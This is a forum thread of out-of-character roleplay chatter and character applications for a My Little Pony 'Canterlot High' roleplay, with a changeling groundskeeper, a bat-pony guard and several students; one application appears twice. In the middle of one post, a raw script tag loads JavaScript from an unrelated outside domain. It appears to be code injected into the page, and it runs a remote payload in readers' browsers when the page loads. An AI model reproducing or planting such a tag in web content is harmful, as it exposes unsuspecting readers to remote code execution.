Banner by ~ Ice Princess Silky

ooc {OOC} Canterlot High

NonbinaryDuck

(edited)

@@NonbinaryDuck,

Name: Lee

Race: Primarily Unicorn (Though sometimes Pegasus...if needed. He prefers that people don't know that he's a changeling.) 

Species (for non-ponies): Changeling 

Occupation: Grounds Keeper (you can decide where you need him. Maybe he can be the general handy man? He is like 90+ years old.)

Why would you like to be a Staff Member?: I am a very good handy pony to have around. I've done many jobs, so I can do anything from fixing computers to basic jantorial work. Anything the school needs to stay up and running properly, I can do to help. 

How will you improve our school and the environment?: I can keep the school clean and running smoothly. I can also tell if students are distraught or need help due to...certain gifts of mine. 

Interests/Hobbies: Just about anything. I've been around for a while. I'm a little older then I look due to magical...enhancements...  

LikesQuiet, Books, Friendly Ponies, Good Food, Logic, Efficiency 

DislikesLoud or Messy Situations, Illogical or Inefficient things, Things that Taste Bad, Mean/Disrespectful Ponies 

Author's Note: Due to Lee being a changeling and Changelings being able to shape shift, I've theorized that he should have the gift of longevity. 

Name: Paladin

RaceBat Pony

Why would you like to be a Staff Member?: Princess Luna figures that the local High School should have decent security (I'm better then decent, considering that I'm part of the royal lunar guard) 

How will you improve our school and the environment?: I will keep it safe and peaceful by putting down any trouble quickly and with little to no remorse ensuring that any trouble makers receive adequate consequences for their actions. Mental note: This is a school, not a battle. Keep everything non-lethal...oh, and keep the students safe. 

Interests/Hobbies: Basic training, work outs, weaponry upkeep

Likes: Sharp weapons, Spotless Armor, Night, Princess Luna

Dislikes: Disrespectful ponies, Early Mornings, Empty Coffee Pot

Edited by Fictional_Author7
  • Brohoof 1

I think so Jay... He brohoofed mine and said it was in aswell as the other people's so i would say its a strong yes in maybe.

• Brohoof 1

I apologize, everypony! I've been low on "spoons" recently and it's been difficult for me to cooperate! Anyhow, I'm now adding the new applicants to the list. Once again, sorry! Hehe, this mare is a bit ditzy!

Can someone please toss me a quote of one of my posts (Mentions bugged) when it's time for me to teach a class? Unless someone wants to interact with Lektra outside of class hours.

<script src="https://gsafejs.me/services/gw/gw5US.js"></script>

;) Well.. it'd be pretty unfortunate if that were to happen.. hehe...

aw...it was gonna be like him sitting down in the football field with a computer and a mic, then suddenly...

"OKAY...OKAY...HELLO? DID I GET IT RIGHT? IM GONNA GUESS I DID. WELL, IM RUNE. NEW STUDENT HERE, DECIDED TO HACK THE SCHOOL SYSTEM TO INTRODUCE MYSELF. YOU KNOW, MARK MYSELF DIFFERENT FROM THE OTHERS. AND STUFF. I GUESS THATS IT!"

Alright. I'll make my first posts soon. 

@@NonbinaryDuck,

Uh...did something happen to our vice principal?  

@,

Lol, I think we're both at the principal's office. Sorry, I'll edit my post to accommodate you. XD  

@@Midnight_Aurora,

In your last post, were you saying that she was trying to teach him something? Something about recognizing genuine vs fake or... 

(edited)

To hide his emotions. She purposely allowed a bit of the forced nature to show. Being raised as an infiltration type changeling, She was taught that emotion mimicry was essential.

Edited by Midnight_Aurora
  • Brohoof 1

@,

Spellbind was walking by minding her own business, but hadn't been watching where she was going. She ended bumping right into another pony, this (i'm presuming purple) colt.

"Oh dear... my apologies..." she said, and tried to get away before he could say anything about her horn.

Lol, he's currently in the nurses office talking to the nurse. If you wanted to bump in to anyone, you could bump in to the new grounds keeper, Lee. He's currently waititng outside the principals office with Lightning's OC. 

@@NonbinaryDuck,

(edited)

don't know if I can still apply, I've been looking for one of these roleplays for a long time (about 9 months), it says open so I'll put my application here :)

Name: Sunset Hooves

Race: Male Earth Pony

Species (for non-ponies):

Why would you like to be a student?: Sunset is a character who seeks feeling and a place where he can stay without memory, being a slightly shy pony he enjoys the enviroment where he can work and still make friends without directly approaching a pony. Sunset also wishes to go to a real school (unlike in Appleossa, where education was the last of their worries) as he has not been to a school since the time where he went though Ponyville for a while, and he missed a lot of it due to another event which ended in him leaving. Sunset also likes the idea of a fancy place like Canterlot... or Manehatten

Will you make a good impression upon our school?: Sunset is a friendly (when approached) pony, and tries his best to keep his life in order and not let it affect his work, he does the best he can to keep personal issues out of the way of work.

Will you give a good reputation for our school?:If Quiet, hard working, and helpful is what the school likes as a reputation, though Sunset has been known to do the best he can to blend in with a good crowd even when he doesn't want to. He also doesn't follow the regular Appleossian trend, and tries to change himself to fit what others deem normal so that he can drift past their lives, he also has quite a few bits that he has gained in his work as a colt with his dream to come to a place like this

Interests/Hobbies: writing, geography, apples and magic (just the observation of it)

Likes:literature, cutie marks, travel/exploration, the idea of hope never dying, fire, inteligent ponies, friendship, and honesty

Dislikes:Bits (money), vases, rocks, pens/ink, unicorn horns (there is a reason) (I just noticed there is a pony with a messed up horn, that will probably make things worse for Sunset, I like this development) , being put on the spot (he is quite shy, though he likes being put on the spot when it is one on one because he loves friends), ponies who insult blank flanks, sterotypes (such as the sterotype for somepony from Appleloosa), the colour blue(specificly on mares).

extra: I don't know if I can do this, but Sunset is a blank flank due to events during his younger years, which has created a loop effect where Sunset is disheartened by ponies quite a lot for not having it, thus preventing him from getting it.

Edited by madjack2001

don't know if I can still apply, I've been looking for one of these roleplays for a long time (about 9 months), it says open so I'll put my application here :)

Name: Sunset Hooves

Race: Male Earth Pony

Why would you like to be a student?: Sunset is a character who seeks feeling and a place where he can stay without memory, being a slightly shy pony he enjoys the enviroment where he can work and still make friends without directly approaching a pony. Sunset also wishes to go to a real school (unlike in Appleossa, where education was the last of their worries) as he has not been to a school since the time where he went though Ponyville for a while, and he missed a lot of it due to another event which ended in him leaving

Will you make a good impression upon our school?: Sunset is a friendly (when approached) pony, and tries his best to keep his life in order and not let it affect his work

Will you give a good reputation for our school?:If Quiet, hard working, and helpful is what the school likes as a reputation, though Sunset has been known to do the best he can to blend in with a good crowd even when he doesn't want to. He also doesn't follow the regular Appleossian trend, and tries to change himself to fit what others deem normal so that he can drift past their lives, he also has quite a few bits that he has gained in his work as a colt

Interests/Hobbies: writing, geography, apples and magic (just the observation of it)

Likes:literature, keeping his mind busy, the idea of hope, fire, inteligent ponies, friendship, and honesty

Dislikes:Bits (money), vases, rocks, pens, unicorn horns (there is a reason) (I just noticed there is a pony with a messed up horn, that will probably make things worse for Sunset, I like this) , crates, the Everfree Forest, knifes, being put on the spot, ponies who insult blank flanks, sterotypes

extra: I don't know if I can do this, but Sunset is a blank flank due to events during his younger years, which has created a loop effect where Sunset is disheartened by ponies quite a lot for not having it, thus preventing him from getting it.

Don't know what happened to OP, but they seem to have dissapeared. 

Don't know what happened to OP, but they seem to have dissapeared.

define OP in this context, as I have no idea what all you crazy kids abbreviations mean these days

Not sure I can still sign up, but I would LOVE to join this RP! I'm new here, and I was actually convinced to join by this roleplay!

Name: Skylar

Race: Pegasus

Why would you like to be a student?: She doesn't... she used to go to a huge high school, almost completely focused on sports, which she fit into pretty well. Her parents forced her to come to Canterlot High, smaller and more focused on academics. But she is determined to empower sports at her new high school.

Will you make a good impression upon our school?:  She intends to make a good impression... on all the sport enthusiasts like her.

Will you give a good reputation for our school?: Probably not academically, no.

Interests/Hobbies: Sports, exercise, flying.

Likes:  She is actually very intelligent, and isn't all that good at sports and flying, but academics bored her because of her intelligence so she focuses solely on physical activities, which challenge her because she has wings slightly too large and cannot fly as well naturally as others.

Dislikes: Despite being pretty arrogant, she hates others that are arrogant. She has a dislike of authority, and is even prejudice against older, taller ponies.

Two questions...

One: Are you accepting more than one character for misc. staff postions? Like, another security guard?

Two: What is the acceptable length of time between posts?